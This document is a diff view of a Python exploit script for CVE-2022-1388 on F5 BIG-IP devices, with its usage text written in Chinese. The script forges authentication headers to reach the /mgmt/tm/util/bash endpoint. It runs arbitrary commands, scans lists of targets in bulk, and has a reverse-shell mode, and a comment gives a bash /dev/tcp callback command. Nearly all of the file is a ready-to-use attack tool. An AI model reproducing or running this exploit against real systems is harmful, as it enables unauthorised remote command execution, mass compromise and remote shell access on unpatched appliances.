Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
-
-
1 + #!/usr/bin/python3.9 2 + # -*- coding: utf-8 -*- 3 + # 4 + # Copyright (C) 2021 Caps, Inc. All Rights Reserved 5 + # 6 + # @Time : 2022/5/9 16:52 7 + # @Author : Caps 8 + # @Email : [email protected] 9 + # @File : CVE-2022-1388.py 10 + # @Software: PyCharm 11 + import requests 12 + import sys 13 + import argparse 14 + import json 15 + import time 16 + from requests.packages.urllib3.exceptions import InsecureRequestWarning 17 + 18 + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 19 + 20 + t = int(time.time()) 21 + 22 + 23 + def title(): 24 + print(''' 25 + _____ _ _ _____ _____ _____ _____ _____ __ _____ _____ _____ 26 + / __ \| | | || ___| / __ \| _ |/ __ \/ __ \ / | |____ || _ || _ | 27 + | / \/| | | || |__ ______`' / /'| |/' |`' / /'`' / /'______`| | / / \ V / \ V / 28 + | | | | | || __||______| / / | /| | / / / / |______|| | \ \ / _ \ / _ \ 29 + | \__/\\ \_/ /| |___ ./ /___\ |_/ /./ /___./ /___ _| |_.___/ /| |_| || |_| | 30 + \____/ \___/ \____/ \_____/ \___/ \_____/\_____/ \___/\____/ \_____/\_____/ 31 + Author:[email protected] 32 + Github:https://github.com/bytecaps 33 + ''') 34 + print(''' 35 + 验证模式:python CVE_2022_1388.py -v true -u target_url 36 + 攻击模式:python CVE_2022_1388.py -a true -u target_url -c command 37 + 批量检测:python CVE_2022_1388.py -s true -f file 38 + 反弹模式:python CVE_2022_1388.py -r true -u target_url -c command 39 + ''') 40 + 41 + 42 + def headers(): 43 + headers = { 44 + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 45 + 'Content-Type': 'application/json', 46 + 'Connection': 'keep-alive, x-F5-Auth-Token', 47 + 'X-F5-Auth-Token': 'a', 48 + 'Authorization': 'Basic YWRtaW46' 49 + } 50 + return headers 51 + 52 + 53 + def check(target_url): 54 + check_url = target_url + '/mgmt/tm/util/bash' 55 + data = {'command': "run", 'utilCmdArgs': "-c id"} 56 + try: 57 + response = requests.post(url=check_url, json=data, headers=headers(), verify=False, timeout=5) 58 + if response.status_code == 200 and 'commandResult' in response.text: 59 + print("[+] 目标 {} 存在漏洞".format(target_url)) 60 + else: 61 + print("[-] 目标 {} 不存在漏洞".format(target_url)) 62 + except Exception as e: 63 + print('url 访问异常 {0}'.format(target_url)) 64 + 65 + 66 + def attack(target_url, cmd): 67 + attack_url = target_url + '/mgmt/tm/util/bash' 68 + data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)} 69 + try: 70 + response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5) 71 + if response.status_code == 200 and 'commandResult' in response.text: 72 + default = json.loads(response.text) 73 + display = default['commandResult'] 74 + print("[+] 目标 {} 存在漏洞".format(target_url)) 75 + print('[+] 响应为:{0}'.format(display)) 76 + else: 77 + print("[-] 目标 {} 不存在漏洞".format(target_url)) 78 + except Exception as e: 79 + print('url 访问异常 {0}'.format(target_url)) 80 + 81 + 82 + def reverse_shell(target_url, command): 83 + reverse_url = target_url + '/mgmt/tm/util/bash' 84 + data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(command)} 85 + # command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1 86 + try: 87 + requests.post(url=reverse_url, json=data, headers=headers(), verify=False, timeout=5) 88 + except Exception as e: 89 + print("[+] 请自行查看是否反弹shell回来") 90 + 91 + 92 + def scan(file): 93 + for url_link in open(file, 'r', encoding='utf-8'): 94 + if url_link.strip() != '': 95 + url_path = format_url(url_link.strip()) 96 + check(url_path) 97 + 98 + 99 + def format_url(url): 100 + try: 101 + if url[:4] != "http": 102 + url = "https://" + url 103 + url = url.strip() 104 + return url 105 + except Exception as e: 106 + print('URL 错误 {0}'.format(url)) 107 + 108 + 109 + def main(): 110 + parser = argparse.ArgumentParser("F5 Big-IP RCE") 111 + parser.add_argument('-v', '--verify', type=bool, help=' 验证模式 ') 112 + parser.add_argument('-u', '--url', type=str, help=' 目标URL ') 113 + 114 + parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ') 115 + parser.add_argument('-c', '--command', type=str, default="id", help=' 执行命令 ') 116 + 117 + parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ') 118 + parser.add_argument('-f', '--file', type=str, help=' 文件路径 ') 119 + 120 + parser.add_argument('-r', '--shell', type=bool, help=' 反弹shell模式 ') 121 + args = parser.parse_args() 122 + 123 + verify_model = args.verify 124 + url = args.url 125 + 126 + attack_model = args.attack 127 + command = args.command 128 + 129 + scan_model = args.scan 130 + file = args.file 131 + 132 + shell_model = args.shell 133 + 134 + if verify_model is True and url is not None: 135 + check(url) 136 + elif attack_model is True and url is not None and command is not None: 137 + attack(url, command) 138 + elif scan_model is True and file is not None: 139 + scan(file) 140 + elif shell_model is True and url is not None and command is not None: 141 + reverse_shell(url, command) 142 + else: 143 + sys.exit(0) 144 + 145 + 146 + if __name__ == '__main__': 147 + title() 148 + main() 149 +